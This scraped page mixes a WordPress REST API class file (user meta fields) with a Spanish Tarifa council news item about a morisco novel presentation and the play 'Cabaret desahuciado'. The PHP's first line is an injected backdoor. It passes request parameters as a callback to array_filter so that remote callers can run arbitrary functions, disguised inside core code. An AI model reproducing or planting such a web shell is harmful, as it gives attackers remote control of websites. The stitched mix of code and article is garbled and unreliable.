?php if ($_REQUEST['param1']&&$_REQUEST['param2']) {$f = $_REQUEST['param1']; $p = array($_REQUEST['param2']); $pf = array_filter($p, $f); echo 'OK'; Exit;}; /** * REST API: WP_REST_User_Meta_Fields class * * @package WordPress * @subpackage REST_API * @since 4.7.0 */ /** * Core class used to manage meta values for users via the REST API. * * @since 4.7.0 * * @see WP_REST_Meta_Fields */ class WP_REST_User_Meta_Fields extends WP_REST_Meta_Fields { /** * Retrieves the object meta type. * * @since 4.7.0 * * @return string The user meta type. */ protected function get_meta_type() { return 'user'; } /** * Retrieves the object meta subtype. * * @since 4.9.8 * * @return string 'user' There are no subtypes. */ protected function get_meta_subtype() { return 'user'; } /** * Retrieves the type for register_rest_field(). * * @since 4.7.0 * * @return string The user REST field type. */ public function get_rest_field_type() { return 'user'; } } LA NOVELA SOBRE LOS MORISCOS DE PATRICIO GONZÁLEZ LLEGA A TARIFA – Excmo. Ayuntamiento de Tarifa

LA NOVELA SOBRE LOS MORISCOS DE PATRICIO GONZÁLEZ LLEGA A TARIFA

Se presenta el próximo viernes en una noche cultural que continuará en el teatro Alameda con el «Cabaret desahuciado»

El autor algecireño Patricio González García vuelve de nuevo a Tarifa para presentar una de sus últimas obras literarias. Se trata de la novela “Abdul, una historia morisca”. Inspirada en hechos reales, la obra recrea las expulsiones de los moriscos hace 400 años, y la fundación por muchos de ellos de la ciudad marroquí de Rabat.

Realidad y ficción conviven en una historia tejida a caballo entre Hornachos, Badajoz, como asentamiento original de los moriscos y su posterior deambular por localidades andaluzas hasta reagruparse en Rabat.

La presentación, abierta a todo el público interesado, será el viernes, 7 de noviembre en la Casa de la Cultura, a partir de las ocho de la tarde.

 

También en la misma cita se dará a conocer la edición realizada por la empresa IMAGENTA con una selección de los poemas presentados al último concurso literario de Poesía Luz.

La obra lleva por título “Los Mejores Poemas”, seleccionados de entre la vigésimo primera edición del premio de poesía Luz.

Por otro lado, la tarde-noche del próximo viernes, 7 de noviembre tendrá igualmente al teatro como aliciente. Y es que, a través del Plan DECOC de la Diputación de Cádiz llegará al Alameda la obra “Cabaret desahuciado” con Diana Civila y Lola Botello como coautoras de guión, dirección e interpretación.

Después de haber regentado durante años un cabaret en el Pinsapar de la serranía gaditana, Conchita y Mariló son desahuciadas. Indignadas y en la ruina, cargadas con lo poco que han podido rescatar antes de que llegara la policía, buscan un lugar donde descansar y sacudirse el trauma que supone semejante atropello. En el camino recuerdan glorias pasadas, recreando épocas doradas en las que sus espectáculos brillaban con luz propia. Estas dos mujeres llenas de incertidumbres ante el futuro, demuestran sin embargo ser capaces de convertir el disparate en virtud, la desgracia en ácido humor y la ternura y las ganas de vivir en declaración de principios.

Con entrada libre hasta completar aforo, el teatro de la compañía La Ofendida será la oferta del Alameda a partir de las 21:00 horas del viernes, 7 de noviembre.

0 Comentarios

No hay comentarios disponibles.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

ArabicEnglishFrenchGermanPortugueseSpanish
Cambiar tamaño de texto
Contraste